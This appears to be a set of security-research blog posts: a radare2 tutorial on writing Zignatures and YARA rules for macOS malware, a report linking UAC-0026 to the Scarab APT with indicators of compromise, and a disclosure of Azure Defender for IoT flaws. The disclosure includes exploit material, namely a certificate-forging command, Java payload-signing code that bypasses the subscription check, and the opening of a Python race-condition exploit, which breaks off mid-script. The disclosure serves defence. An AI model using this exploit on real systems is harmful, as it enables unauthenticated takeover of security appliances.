What’s particularly nice about Zignatures is that you can not only search for exact matches but also for matches with a certain similarity score. This allows us to find functions that have been modified from one instantiation to the other but which are otherwise the same.

Zignatures can help us to answer the question of whether an unknown sample is a variant of a known one. Once you are familiar with Zignatures, they can also help you write good detection rules, since they will allow you to see what is constant in a family of malware and what is variant. Combined with YARA rules, which we’ll take a look at later in this post, you can create effective hunting rules for malware repositories like VirusTotal to find variants or use them to help inform the detection logic in malware hunting software.

Create and Use A Zignature

Let’s jump into some malware and create our first Zignature. Here’s a recent sample of WizardUpdate (you might remember we looked at an older sample of WizardUpdate in our post on string decryption).

Loading the sample into r2, analyzing its functions, and displaying its hashes

We’ve loaded the sample into r2 and run some analysis on it. We’ve been conveniently dropped at the main() function, which looks like this.

WizardUpdate main() function

That main function contains some malware specific strings, so should make a nice target for a Zignature. To do so, we use the zaf command, supplying the parameters of the function name and the signature name. Our sample file happened to be called “WizardUpdateB1”, so we’ll call this signature “WizardUpdateB1_main”. In r2, the full command we need, then, is:

> zaf main WizardUpdate_main

We can look at the newly-created Zignature in JSON format with zj~{} (if you’re not sure why we’re using the tilde, review the earlier post on grepping in r2).

An r2 Zignature viewed in JSON format

To see that the Zignature works, try zb and note the output:

zb returns how close the match was to the Zignature and the function at the current address

The first entry in the row is the most important, as that gives us the overall (i.e., average) match (between 0.00000 and 1.00000). The next two show us the match for bytes and graph, respectively. In this case, it’s a perfect match to the function, which is of course what we would expect as this is the sample from which we created the rule.

You can also create Zignatures for every function in the binary in one go with zg.

Create function signatures for every function in a binary with one command

Beware of using zg on large files with thousands of functions though, as you might get a lot of errors or junk output. For small-ish binaries with up to a couple of hundred functions it’s probably fine, but for anything larger than that I typically go for a targeted approach.

So far, we have created and tested a Zignature, but it’s real value lies in when we use the Zignature on other samples.

Create A Reusable and Extensible Zignatures File

At the moment, your Zignatures aren’t much use because we haven’t learned yet how to save and load Zignatures between samples. We’ll do that now.

We can save our generated Zignatures with zos <filename>. Note that if you just provide the bare filename it’ll save in the current working directory. If you give an absolute path to an existing file, r2 will nicely merge the Zignatures you’re saving with any existing ones in that file.

Radare2 does have a default address from which it is supposed to autoload Zignatures if the autoload variable is set, namely ~/.local/share/radare2/zigns/ (in some documentation, it’s ~/.config/radare2/zigns/) However, I’ve never quite been able to get autoload to work from either address, but if you want to try it, create the above location and in your radare2 config file (~/.radare2rc) add the following line.

e zign.autoload = true

In my case, I load my zigs file manually, which is a simple command: zo <filename> to load, and zb to run the Zignatures contained in the file against the function at the current address.

Sample WizardUpdate_B2’s main function doesn’t match our Zignature

Sample WizardUpdate_B5’s main function is a perfect match for our Zignature

As you can see, the Sample above B5 is a perfect match to B1, whereas B2 is way off with the match only around 46.6%.

When you’ve built up a collection of Zignatures, they can be really useful for checking a new sample against known families. I encourage you to create Zignatures for all your samples as they will pay dividends down the line. Don’t forget to back them up too. I learned the hard way that not having a master copy of my Zigs outside of my VMs can cause a few tears!

Creating YARA Rules Within radare2

Zignatures will help you in your efforts to determine if some new malware belongs to a family you’ve come across before, but that’s only half the battle when we come across a new sample. We also want to hunt – and detect – files that are like it. For that, YARA is our friend, and r2 handily integrates the creation of YARA strings to make this easy.

In this next example, we can see that a different WizardUpdate sample doesn’t match our earlier Zignature.

The output from zb shows that the current function doesn’t match any of our previous function signatures

While we certainly want to add a function signature for this sample’s main() to our existing Zigs, we also want to hunt for this on external repos like VirusTotal and elsewhere where YARA can be used.

Our main friend here is the pcy command. Since we’ve already been dropped at main()’s address, we can just run the pcy command directly to create a YARA string for the function.

Generating a YARA string for the current function

However, this is far too specific to be useful. Fortunately, the pcy command can be tailored to give us however many bytes we wish at whatever address.

We know that WizardUpdate makes plenty of use of ioreg, so let’s start by searching for instances of that in the binary.

Searching for the string “ioreg” in a WizardUpdate sample

Lots of hits. Let’s take a closer look at the hex of the first one.

A URL embedded in the WizardUpdate sample

That URL address might be a good candidate to include in a YARA rule, let’s try it. To grab it as YARA code, we just seek to the address and state how many bytes we want.

Generating a YARA string of 48 bytes from a specific address

This works nicely and we can just copy and paste the code into VT’s search with the content modifier. Our first effort, though, only gives us 1 hit on VirusTotal, although at least it’s different from our initial sample (we’ll add that to our collection, thanks!).

Our string only found a single hit on VirusTotal

But note how we can iterate on this process, easily generating YARA strings that we can use both for inclusion and exclusion in our YARA rules.

This time we had better success with 46 hits for one string

This string gives us lots of hits, so let’s create a file and add the string.

pcy 32 >> WizardUpdate_B.yara
Outputting the YARA string to a file

From here on in, we can continue to append further strings that we might want to include or exclude in our final YARA rule. When we are finished, all we have to do is open our new .yara file and add the YARA meta data and conditional logic, or we can paste the contents of our file into VTs Livehunt template and test out our rule there.

Xrefs For the Win

At the beginning of this post I said that the answer to some of the challenges we would deal with today were “part Art and part Science”. We’ve done plenty of “the Science”, so I want to round out the post by talking a little about “the Art”. Let’s return to a topic we covered briefly earlier in this series – finding cross-references in r2 – and introduce a couple of handy tips that can make development of hunting rules a little easier.

When developing a hunting or detection rule for a malware family, we are trying to balance two opposing demands: we want our rule to be specific enough not to create false positives, but wide or general enough not to miss true positives. If we had perfect knowledge of all samples that ever had been or ever would be created for the family under consideration, that would be no problem at all, but that’s precisely the knowledge-gap that our rule is aiming to fill.

A common tip for writing YARA rules is to use something like a combination of strings, method names and imports to try to achieve this balance. That’s good advice, but sometimes malware is packed to have virtually none of these, or not enough to make them easily distinguishable. On top of that, malware authors can and do easily refactor such artifacts and that can make your rules date very quickly.

A supplementary approach that I often use is to focus on code logic that is less easy for author’s to change and more likely to be re-used.

Let’s take a look at this sample of Adload written in Go. It’s a variant of a much more prolific version, also written in Google’s Golang. Both versions contain calls to a legit project found on Github, but this variant is missing one of the distinctive strings that made its more widespread cousin fairly easy to hunt.

A version of Adload that calls out to a popular project on Github

However, notice the URL at 0x7226. That could be interesting, but if we hit on that domain name string alone in VirusTotal we only see 3 hits, so that’s way too tight for our rule.

Your rules won’t catch much if your strings are too specific
Let’s grab some bytes immediately after the C2 string is loaded

We might do better if we try grabbing bytes of code right after that string has been loaded, for while the API string will certainly change, the code that consumes it perhaps might not. In this case, searching on 96 bytes from 0x7255 catches a more respectable 23 hits, but that still seems too low for a malware variant that has been circulating for many months.

Notice the dates – this malware has probably far more than just 23 samples

Let’s see if we can do better. One trick I find useful with r2 is to hunt down all the XREFs to a particular piece of code and then look at the calling functions for useful sequences of byte code to hunt on.

For example, you can use sf. to seek to the beginning of a function from a given address (assuming it’s part of a function, of course) and then use axg to get the path of execution to that function all the way from main(). You can use pds to give you a summary of the calls in any function along the way, which means combining axg and pds is a very good way to quickly move around a binary in r2 to find things of interest.

Using the axg command to trace execution path back to main

Now that we can see the call graph to the C2 string, we can start hunting for logic that is more likely to be re-used across samples. In this case, let’s hunt for bytes where sym.main.main calls the function that loads the C2 URL at 0x01247a41.

Finding reusable logic that should be more general than individual strings

Grabbing 48 bytes from that address and hunting for it on VT gives us a much more respectable 45 TP hits. We can also see from VT that these files all have a common size, 5.33MB, which we can use as a further pivot for hunting.

Our hunt is starting to give better results, but don’t stop here!

We’ve made a huge improvement on our initial hits of 3 and then 23, but we’re not really done yet. If we keep iterating on this process, looking for reusable code rather than just specific strings, imports or method names, we’re likely to do much better, and by now you should have a solid understanding of how to do that using r2 to help you in your quest. All you need now, just like any good piece of malware, is a bit of persistence!


In this post, we’ve taken a look at some of r2’s lesser known features that are extremely useful for hunting malware families, both in terms of associating new samples to known families and in searching for unknown relations to a sample or samples we already have. If you haven’t checked out the previous posts in this series, have a look at Part 1, Part 2 and Part 3. If you would like us to cover other topics on r2 and reverse engineering macOS malware, ping me or SentinelLabs on Twitter with your suggestions.

Samples Used

File name SHA1
WizardUpdate_B1 2f70787faafef2efb3cafca1c309c02c02a5969b
WizardUpdate_B2 dfff3527b68b1c069ff956201ceb544d71c032b2
WizardUpdate_B3 814b320b49c4a2386809b0bdb6ea3712673ff32b
WizardUpdate_B4 6ca80bbf11ca33c55e12feb5a09f6d2417efafd5
WizardUpdate_B5 92b9bba886056bc6a8c3df9c0f6c687f5a774247
WizardUpdate_B6 21991b7b2d71ac731dd8a3e3f0dbd8c8b35f162c
WizardUpdate_B7 6e131dca4aa33a87e9274914dd605baa4f1fc69a
WizardUpdate_B8 dac9aa343a327228302be6741108b5279adcef17
Adload 279d5563f278f5aea54e84aa50ca355f54aac743

Chinese Threat Actor Scarab Targeting Ukraine

By: Tom Hegel
24 March 2022 at 16:05

Executive Summary

  • Ukraine CERT (CERT-UA) has released new details on UAC-0026, which SentinelLabs confirms is associated with the suspected Chinese threat actor known as Scarab.
  • The malicious activity represents one of the first public examples of a Chinese threat actor targeting Ukraine since the invasion began.
  • Scarab has conducted a number of campaigns over the years, making use of a custom backdoor originally known as Scieron, which may be the predecessor to HeaderTip.
  • While technical specifics vary between campaigns, the actor generally makes use of phishing emails containing lure documents relevant to the target, ultimately leading to the deployment of HeaderTip.


On March 22nd 2022, CERT-UA published alert #4244, where they shared a quick summary and indicators associated with a recent intrusion attempt from an actor they dubbed UAC-0026. In the alert, CERT-UA noted the delivery of a RAR file archive "Про збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.rar", which translates to “On the preservation of video recordings of criminal actions of the army of the Russian Federation.rar”. Additionally, they note the archive contains an executable file, which opens a lure document, and drops the DLL file "officecleaner.dat" and a batch file "officecleaner". CERT-UA has named the malicious DLL ‘HeaderTip’ and notes similar activity was recorded in September 2020.

The UAC-0026 activity is the first public example of a Chinese threat actor targeting Ukraine since the invasion began. While there has been a marked increase in publicly reported attacks against Ukraine over the last week or so, these and all prior attacks have otherwise originated from Russian-backed threat actors.

Rough timeline of recent Ukrainian conflict cyber activity

Connection of HeaderTip to Scarab APT

Scarab has a relatively long history of activity based on open source intelligence. The group was first identified in 2015, while the associated IOCs are archived on OTX. As noted in the previous research, Scarab has operated since at least 2012, targeting a small number of individuals across the world, including Russia, United States, and others. The backdoor deployed by Scarab in their campaigns is most commonly known as Scieron.

During our review of the infrastructure and HeaderTip malware samples shared by CERT-UA, we identified relations between UAC-0026 and Scarab APT.

We assess with high confidence the recent CERT-UA activity attributed to UAC-0026 is the Scarab APT group. An initial link can be made through the design of the malware samples and their associated loaders from at least 2020. Further relationships can be identified through the reuse of actor-unique infrastructure between the malware families associated with the groups:

  • 508d106ea0a71f2fd360fda518e1e533e7e584ed (HeaderTip – 2021)
  • 121ea06f391d6b792b3e697191d69dc500436604 (Scieron 2018)
  • Dynamic.ddns[.]mobi (Reused C2 Server)

As noted in the 2015 reporting on Scarab, there are various indications the threat actor is Chinese speaking. Based on known targets since 2020, including those against Ukraine in March 2022, in addition to specific language use, we assess with moderate confidence that Scarab is Chinese speaking and operating under geopolitical intelligence collection purposes.

Lure Documents

Analysis of lure documents used for initial compromise can provide insight into those being targeted and particular characteristics of their creator. For instance, in a September 2020 campaign targeting suspected Philippines individuals, Scarab made use of lure documents titled “OSCE-wide Counter-Terrorism Conference 2020”. For context, OSCE is the Organization for Security and Co-operation in Europe.

September 2020 Scarab APT Lure Document Content

More recently, industry colleagues have noted a case in which Scarab was involved in a campaign targeting European diplomatic organizations during the US withdrawal from Afghanistan.

The lure document reported by CERT-UA mimics the National Police of Ukraine, themed around the need to preserve video materials of crimes conducted by the Russian military.

Ukraine Targeting Lure Document

Lure documents through the various campaigns contain metadata indicating the original creator is using the Windows operating system in a Chinese language setting. This includes the system’s username set as “用户” (user).

Malware and Infrastructure

Multiple methods have been in use to attempt to load the malware onto the target system. In the case of the 2020 documents, the user must enable document Macros. In the most recent version from CERT-UA, the executable loader controls the install with the help of a batch file while also opening the lure document. The loader executable itself contains the PDF, batch installer, and HeaderTip malware as resource data.

The batch file follows a simple set of instructions to define the HeaderTip DLL, set persistence under HKCU\Software\Microsoft\Windows\CurrentVersion\Run, and then execute HeaderTip. Exports called across the HeaderTip samples have been HttpsInit and OAService, as shown here.

officecleaner.bat File Contents

The HeaderTip samples are 32-bit DLL files, written in C++, and roughly 9.7 KB. The malware itself will make HTTP POST requests to the defined C2 server using the user agent: "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko". General functionality of HeaderTip is rather limited to beaconing outbound for updates, potentially so it can act as a simple first stage malware waiting for a second stage with more capabilities.

Scarab has repeatedly made use of dynamic DNS services, which means C2 server IP, and subdomains should not be considered related. In fact, some of the dynamic DNS services used by Scarab can easily link one to various unrelated APT groups, such as the infamous CloudHopper report or 2015 bookworm malware blogs. While those may be associated with Chinese APTs, it may indicate more of a standard operating toolkit and approach rather than shared technical resources.


We assess with high confidence the recent CERT-UA activity attributed to UAC-0026 is the Scarab APT group and represents the first publicly-reported attack on Ukraine from a non-Russian APT. The HeaderTip malware and associated phishing campaign utilizing Macro-enabled documents appears to be a first-stage infection attempt. At this point in time, the threat actor’s further objectives and motivations remain unclear.

Indicators of Compromise

IOC Description
product2020.mrbasic[.]com March 2022 C2 Server
8cfad6d23b79f56fb7535a562a106f6d187f84cf March 2022 Ukraine file delivery archive “Про збереження відеоматеріалів з фіксацією злочинних дій армії російської федерації.rar”
e7ef3b033c34f2ac2772c15ad53aa28599f93a51 March 2022 Loader Executable “officecleaner.dat”
fdb8de6f8d5f8ca6e52ce924a72b5c50ce6e5d6a March 2022 Ukraine lure document “#2163_02_33-2022.pdf”
4c396041b3c8a8f5dd9db31d0f2051e23802dcd0 March 2022 Ukraine batch file “officecleaner.bat”
3552c184281abcc14e3b941841b698cfb0ec9f1d March 2022 Ukraine HeaderTip sample “httpshelper.dll”
ebook.port25[.]biz September 2020 C2 Server
fde012fbcc65f4ab84d5f7d4799942c3f8792cc3 September 2020 file delivery archive “Joining Instructions IMPC 1.20 .rar”
e30a24e7367c4a82d283c7c68cff5739319aace9 September 2020 lure document “Joining Instructions IMPC 1.20 .xls”
5cc8ce82fc21add608277384dfaa8139efe8bea5 September 2020 HeaderTip samples based on C2 use
mert.my03[.]com September 2020 C2 Server
90c4223887f10f8f9c4ac61f858548d154183d9a September 2020 file delivery archive “OSCE-wide Counter-Terrorism Conference”
82f8c69a48fa1fa23ff37a0b0dc23a06a7cb6758 September 2020 lure document “OSCE-wide Counter-Terrorism Conference 2020”
b330cf088ba8c75d297d4b65bdbdd8bee9a8385c September 2020 HeaderTip sample”officecleaner.dll”
83c4a02e2d627b40c6e58bf82197e113603c4f87 HeaderTip (Possible researcher)
508d106ea0a71f2fd360fda518e1e533e7e584ed HeaderTip
dynamic.ddns[.]mobi C2 Server, overlaps with Scieron (b5f2cc8e8580a44a6aefc08f9776516a)

Pwning Microsoft Azure Defender for IoT | Multiple Flaws Allow Remote Code Execution for All

28 March 2022 at 17:59

By Kasif Dekel and Ronen Shustin (independent researcher)

Executive Summary

  • SentinelLabs has discovered a number of critical severity flaws in Microsoft Azure’s Defender for IoT affecting cloud and on-premise customers.
  • Unauthenticated attackers can remotely compromise devices protected by Microsoft Azure Defender for IoT by abusing vulnerabilities in Azure’s Password Recovery mechanism.
  • SentinelLabs’ findings were proactively reported to Microsoft in June 2021 and the vulnerabilities are tracked as CVE-2021-42310, CVE-2021-42312, CVE-2021-37222, CVE-2021-42313 and CVE-2021-42311 marked as critical, some with CVSS score 9.8.
  • Microsoft has released security updates to address these critical vulnerabilities. Users are encouraged to take action immediately.
  • At this time, SentinelLabs has not discovered evidence of in-the-wild abuse.


Operational technology (OT) networks power many of the most critical aspects of our society; however, many of these technologies were not designed with security in mind and can’t be protected with traditional IT security controls. Meanwhile, the Internet of Things (IoT) is enabling a new wave of innovation with billions of connected devices, increasing the attack surface and risk.

The problem has not gone unnoticed by vendors, and many offer security solutions in an attempt to address it, but what if the security solution itself introduces vulnerabilities? In this report, we will discuss critical vulnerabilities found in Microsoft Azure Defender for IoT, a security product for IoT/OT networks by Microsoft Azure.

First, we show how flaws in the password reset mechanism can be abused by remote attackers to gain unauthorized access. Then, we discuss multiple SQL injection vulnerabilities in Defender for IoT that allow remote attackers to gain access without authentication. Ultimately, our research raises serious questions about the security of security products themselves and their overall effect on the security posture of vulnerable sectors.

Microsoft Azure Defender For IoT

Microsoft Defender for IoT is an agentless network-layer security for continuous IoT/OT asset discovery, vulnerability management, and threat detection that does not require changes to existing environments. It can be deployed fully on-premises or in Azure-connected environments.

Source: Microsoft Azure Defender for IoT architecture

This solution consists of two main components:

  • Microsoft Azure Defender For IoT Management – Enables SOC teams to manage and analyze alerts aggregated from multiple sensors into a single dashboard and provides an overall view of the health of the networks.
  • Microsoft Azure Defender For IoT Sensor – Discovers and continuously monitors network devices. Sensors collect ICS network traffic using passive (agentless) monitoring on IoT and OT devices. Sensors connect to a SPAN port or network TAP and immediately begin performing DPI (Deep packet inspection) on IoT and OT network traffic.

Both components can be either installed on a dedicated appliance or on a VM.

Deep packet inspection (DPI) is achieved via the horizon component, which is responsible for analyzing network traffic. The horizon component loads built-in dissectors and can be extended to add custom network protocol dissectors.

Defender for IoT Web Interface Attack Surface

Both the management and the sensor share roughly the same code base, with configuration changes to fit the purpose of the machine. This is the reason why both machines are affected by most of the same vulnerabilities.

The most appealing attack surface exposed on both machines is the web interface, which allows controlling the environment in an easy way. The sensor additionally exposes another attack surface which is the DPI service (horizon) that parses the network traffic.

After installing and configuring the management and sensors, we are greeted with the login page of the web interface.

The same credentials are used also as the login credentials for the SSH server, which gives us some more insights into how the system works. The first thing we want to do is obtain the sources to see what is happening behind the scenes, so how do we get those?

Defender for IoT is a product formerly known as CyberX, acquired by Microsoft in 2020. Looking around in the home directory of the “cyberx” user, we found the installation script and a tar archive containing the system’s encrypted files. Reading the script we found the command that decrypts the archive file. A minified version:

openssl enc -d -aes256 -in ./product.tar.gz -md sha512 -k <KEY> | tar xz -C <TARGET_DIR>

The decryption key is shared across all installations.

After extracting the data we found the sources for the web interface ( written in Python) and got to work.

We first aimed to find any exposed unauthenticated APIs and look for vulnerabilities there.

Finding Potentially Vulnerable Controllers

The file contains the main routes for the web application:

xsense_routes = [
    ['handshake', XSenseHandshakeApiHandler]
xsense_v17_routes = [
    ['sync', xsense_v17.XSenseSyncApiHandler]
upgrade_v1_routes = [
    ['status', upgrade_v1.RemoteUpgradeStatusApiHandler],
    ['upgrade-log', upgrade_v1.RemoteUpgradeLogFileApiHandler]
token_v1_routes = [
    ['verify', token_v1.TokenVerificationHandlers],
    ['update-handshake', token_v1.UpdateHandshakeHandlers],
frontend_routes = [
    ['alerts', AlertsApiHandler],
    ['alerts/(?P[0-9]*)', AlertsApiHandler],
    ['alerts/scenarios', AlertScenariosApiHandler],
management_routs = [
    ['backup/sync', ManagementApiHandler],
    ['backup/package', ManagementApiBackupHandler],
    ['backup/maintenance', MaintenanceApiHandler]

Using Jetbrains IntelliJ’s class hierarchy feature we can easily identify route controllers that do not require authentication.

Route controllers that do not require authentication

Every controller that inherits from BaseHandler and does not validate authentication or requires a secret token is a good candidate at this point. Some controllers drew our attention in particular.

Understanding Azure’s Password Recovery Mechanism

The password recovery mechanism for both the management and sensor operates as follows:

  1. Access to management/sensor URL (e.g., https://ip/login#/dashboard)
  2. Go to the “Password Recovery” page.
  3. Copy the ApplianceID provided in this page to the Azure console and get a password reset ZIP file which you upload in the password reset page.
  4. Upload the signed ZIP file to the management/sensor Password Recovery page using the mentioned form in Step 2. This ZIP contains digitally-signed proof that the user is the owner of this machine, by way of digital certificates and signed data.
  5. A new password is generated and displayed to the user

Under the hood:

  1. The actual process is divided into two requests to the management/sensor server:
    1. Upload of the signed ZIP proof
    2. Password recovery
  2. When a ZIP file is uploaded, it is being extracted to the /var/cyberx/reset_password directory (handled by ZipFileConfigurationApiHandler).
  3. When a password recovery request is being processed, the server performs the following operations:
    1. The PasswordRecoveryApiHandler controller validates the certificates. This validates that the certificates are properly signed by a Root CA. in addition, it checks whether these certificates belong to Azure servers.
    2. A request is sent to an internal Tomcat server to further validate the properties of the machine.
    3. If all checks pass properly, PasswordRecoveryApiHandler generates a new password and returns it to the user.

The ZIP contains the following files:

  • IotDefenderSigningCertificate.pem – Azure public key, used to verify the data signature in ResetPassword.json, signed by issuer.pem.
  • Issuer.pem – Signs IotDefenderSigningCertificate.pem, signed by a trusted root CA.
  • ResetPassword.json – JSON application data, properties of the machine.

The content of the ResetPassword.json file looks as follows:

  "properties": {
    "tenantId": "<TENANTID>",
    "subscriptionId": "<SUBSCRIPTIONID>",
    "type": "PasswordReset",
    "applianceId": "<APPLIANCEID>",
    "issuanceDate": "<ISSUANCEDATA>"
  "signature": "<BASE64_SIGNATURE>"

According to Step 2, the code that processes file uploads to the reset_password directory (components\xsense-web\cyberx_web\api\ looks as follows:

class ZipFileConfigurationApiHandler(BaseHandler):
    def _post(self):
        path = self.request.POST.get('path')
        approved_path = ['licenses', 'reset_password']
        if path not in approved_path:
            raise Exception("provided path is not approved")
        path = os.path.join('/var/cyberx', path)
        files = self.request.FILES
        for file_name in files:
            license_zip = files[file_name]
            zf = zipfile.ZipFile(license_zip)

As shown, the code extracts the user delivered ZIP to the mentioned directory, and the following code handles the password recovery requests (cyberx python library file

class PasswordRecoveryApiHandler(BaseHandler):
    def _get(self):
        global host_id
        if not host_id:
            host_id = common.get_system_id()
            host_id = common.add_dashes(host_id)
        return {
            'instanceId': host_id
    def _post(self):
        print 'resetting user password'
        result = {}
            body = self.parse_body()
            user = body.get('user')
            if user != 'cyberx' and user != 'support':
                raise Exception('Invalid user')
            except Exception as e:
                logging.error('could not verify activation certificate, error {}'.format(e.message))
                result = {
                    "internalSystemErrorMessage": '',
                    "userDisplayErrorMessage": 'This password recovery file is invalid.' +
                                                  'Download a new file. If this does not work, contact support.'
            url = ""
            r =
            # Reset passwords
            user_new_password = common.generate_password()
            self._set_user_password(user, user_new_password)
            if not result:
                result = {
                    'newPassword': user_new_password
        return result

The function first validates the provided user and calls the function _try_reset_password:

 def _try_reset_password(self):
        license_signing_certificate_path = os.path.join(RESET_PASSWORD_DIR_PATH, SIGNING_CERTIFICATE_FILE_NAME)
        intermediate_issuer_certificate_path = os.path.join(RESET_PASSWORD_DIR_PATH, ISSUER_CERTIFICATE_FILE_NAME)
        cert_data = ssl.verify_certificate(intermediate_issuer_certificate_path, license_signing_certificate_path)
        certificate = load_certificate(FILETYPE_PEM, cert_data)
        print 'validating subject'
        print 'validating issuer'

Internally, this code validates the certificates, including the issuer.

Afterwards, a request to an internal API is made and handled by a Java component that eventually executes the following code:

public class ResetPasswordManager {
  private static final Logger LOGGER = LoggerFactory.getLogger(ResetPasswordManager.class);
  private static final String RESET_PASSWORD_CERTIFICATE_PATH = "/var/cyberx/reset_password/IotDefenderSigningCertificate.pem"; 
  private static final String RESET_PASSWORD_JSON_PATH = "/var/cyberx/reset_password/ResetPassword.json";
  private static final ActivationConfiguration ACTIVATION_CONFIGURATION = new ActivationConfiguration();
  public static void resetPassword() throws Exception {"Trying to reset password");
    JSONObject resetPasswordJson = new JSONObject("/var/cyberx/reset_password/ResetPassword.json"));
    ResetPasswordProperties resetPasswordProperties = (ResetPasswordProperties)JsonSerializer.fromString(resetPasswordJson
        .getJSONObject("properties").toString(), ResetPasswordProperties.class);
    boolean signatureValid = CryptographyUtils.isSignatureValid(JsonSerializer.toString(resetPasswordProperties).getBytes(StandardCharsets.UTF_8), resetPasswordJson
        .getString("signature"), "/var/cyberx/reset_password/IotDefenderSigningCertificate.pem");
    if (!signatureValid) {
      LOGGER.error("Signature validation failed");
      throw new Exception("This signature file is not valid");
    String subscriptionId = resetPasswordProperties.getSubscriptionId();
    String machineSubscriptionId = ACTIVATION_CONFIGURATION.getSubscriptionId();
    if (!machineSubscriptionId.equals("") && 
      !machineSubscriptionId.contains(resetPasswordProperties.getSubscriptionId())) {
      LOGGER.error("Subscription ID didn't match");
      throw new Exception("This signature file is not valid");
    DateTime issuanceDate = 
    if ( {
      LOGGER.error("Password reset file expired");
      throw new Exception("Password reset file expired");
    if (!Environment.getSensorUUID().replace("-", "").equals(resetPasswordProperties.getApplianceId().trim().toLowerCase().replace("-", ""))) {
      LOGGER.error("Appliance id not equal to real uuid");
      throw new Exception("Appliance id not equal to real uuid");

This code validates the password reset files yet again. This time it also validates the signature of the ResetPassword.json file and its properties.

If all goes well and the Java API returns 200 OK status code, the PasswordRecoveryApiHandler controller proceeds and generates a new password and returns it to the user.

Vulnerabilities in Defender for IOT

As shown, the password recovery mechanism consists of two main entities:

  • The Python web API (external)
  • The Java web API (tomcat, internal)

This introduces a time-of-check-time-of-use (TOCTOU) vulnerability, since no synchronization mechanism is applied.

As mentioned, the reset password mechanism starts with a ZIP file upload. This primitive lets us upload and extract any files to the /var/cyberx/reset_password directory.

There is a window of opportunity in this flow that makes it possible to change the files in /var/cyberx/reset_password between the first verification (Python API) and the second verification (Java API) in a way that the Python API validates that the files are correctly signed by Azure certificates. Then the Java API processes the replaced specially crafted files that causes it to falsely approve their authenticity and return the 200 OK status code.

The password recovery Java API contains logical flaws that let specially-crafted payloads bypass all verifications.

The Java API validates the signature of the JSON file (same code as above):

JSONObject resetPasswordJson = new JSONObject("/var/cyberx/reset_password/ResetPassword.json"));
    ResetPasswordProperties resetPasswordProperties = (ResetPasswordProperties)JsonSerializer.fromString(resetPasswordJson
        .getJSONObject("properties").toString(), ResetPasswordProperties.class);
    boolean signatureValid = CryptographyUtils.isSignatureValid(JsonSerializer.toString(resetPasswordProperties).getBytes(StandardCharsets.UTF_8), resetPasswordJson
        .getString("signature"), "/var/cyberx/reset_password/IotDefenderSigningCertificate.pem");
    if (!signatureValid) {
      LOGGER.error("Signature validation failed");
      throw new Exception("This signature file is not valid");

The issue here is that it doesn’t verify the IotDefenderSigningCertificate.pem certificate as opposed to the Python API verification. It only checks that the signature in the JSON file is signed by the attached certificate file. This introduces a major flaw.

An attacker can therefore generate a self-signed certificate and sign the ResetPassword.json payload that will pass the signature verification.

As already mentioned, the ResetPassword.json looks like the following:

  "properties": {
    "tenantId": "<TENANTID>",
    "subscriptionId": "<SUBSCRIPTIONID>",
    "type": "PasswordReset",
    "applianceId": "<APPLIANCEID>",
    "issuanceDate": "<ISSUANCEDATA>"

Afterwards, there is a subscription ID check:

  String subscriptionId = resetPasswordProperties.getSubscriptionId();
    String machineSubscriptionId = ACTIVATION_CONFIGURATION.getSubscriptionId();
    if (!machineSubscriptionId.equals("") && 
      !machineSubscriptionId.contains(resetPasswordProperties.getSubscriptionId())) {
      LOGGER.error("Subscription ID didn't match");
      throw new Exception("This signature file is not valid");

This is the only property that cannot be obtained by a remote attacker and is infeasible to guess in a reasonable time. However, this check can be easily bypassed.

The code takes the subscriptionId from the JSON file and compares it to the machineSubscriptionId. However, the code here is flawed. It checks if machineSubscriptionId contains the subscriptionId from the user controlled JSON file and not the other way around. The use of .contains() is entirely insecure. The subscriptionId is in the format of a GUID, which means it must contain a hyphen. This allows us to bypass this check by only providing a single hyphen character.

Next, the issuanceDate is checked, followed by ApplianceId. This is already supplied to us by the password recovery page (mentioned in Step 2).

Now we understand that we can bypass all of the checks in the Java API, meaning that we only need to successfully win the race condition and ultimately reset the password without authorization.

The fact that the ZIP upload interface and password recovery interface are divided came in handy in the exploitation phase and lets us win the race more easily.

Preparing To Attack Azure Defender For IoT

To prepare the attack we need to do the following.

  1. Obtain a legitimate password recovery ZIP file from the Azure portal. Obviously, we cannot access the Azure user that the victim machine belongs to, but we can use any Azure user and generate a “dummy” ZIP file. We only need the recovery ZIP file to obtain a legitimate certificate. This can be done at the following URL:

    For that matter, we can create a new trial Azure account and generate a recovery file using that interface mentioned above. The secret identifier is irrelevant and may contain garbage.

  2. Then we need to generate a specially crafted (“bad”) ZIP file. This ZIP file will contain two files:
    • IotDefenderSigningCertificate.pem – a self-signed certificate. It can be generated by the following command:
      openssl     req  -x509   -nodes     -newkey rsa:2048     -keyout key.pem     -out IotDefenderSigningCertificate.pem     -subj "/C=DE/ST=NRW/L=Berlin/O=My Inc/OU=ALEG/[email protected]"
    • ResetPassword.json – properties data JSON file, signed by the self-signed certificate mentioned above and modified accordingly to bypass the Java API verifications.

This JSON file can be signed using the following Java code:

import com.cyberx.infrastructure.common.configuration.ActivationConfiguration;
import com.cyberx.infrastructure.common.serializers.JsonSerializer;
import com.cyberx.infrastructure.common.utils.CryptographyUtils;
import com.cyberx.infrastructure.common.utils.FileUtils;
import com.cyberx.infrastructure.models.pojos.ResetPasswordProperties;
import java.nio.charset.StandardCharsets;
import org.joda.time.DateTime;
import org.joda.time.ReadableInstant;
import org.joda.time.format.DateTimeFormat;
import org.json.JSONObject;
import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.apache.commons.codec.binary.Base64;
    public static void sign() {
        String data = "{\"tenantId\":\"<redacted>\",\"subscriptionId\":\"-\",\"type\":\"PasswordReset\",\"applianceId\":\"<redacted>\",\"issuanceDate\":\"06/19/2021\"}";
        try {
            String signature = Base64.encodeBase64String(CryptographyUtils.rsaSign("C:\\key.pem", data.getBytes()));
            JSONObject jsonData = new JSONObject(data);
            JSONObject completeData = new JSONObject();
            completeData.put("properties", jsonData);
            completeData.put("signature", signature);
            FileUtils.write("C:\\ResetPassword.json", completeData.toString());
        } catch (GeneralSecurityException e) {
        } catch (IOException e) {

As mentioned, the applianceId is obtained from the password recovery page. The tenantId is not verified, thus can be anything.

The issuanceDate parameter is self explanatory.

Once generated and signed, it can be added to a ZIP archive and be used by the following Python exploit script:

import requests
import threading
import time
import sys
from urllib3.exceptions import InsecureRequestWarning
HOST = ""
BENIGN_DATA = open(BENIGN_RESET_PATH, "rb+").read()
def upload_reset_file(data, timeout=0):
    headers = {
        "X-CSRFTOKEN": "aaaa",
        "Referer": "https://{0}/login".format(HOST),
        "Origin": "https://{0}".format(HOST)
    cookies = {
        "csrftoken": "aaaa"
    files = {"file": data}
    data = {"path": "reset_password"}
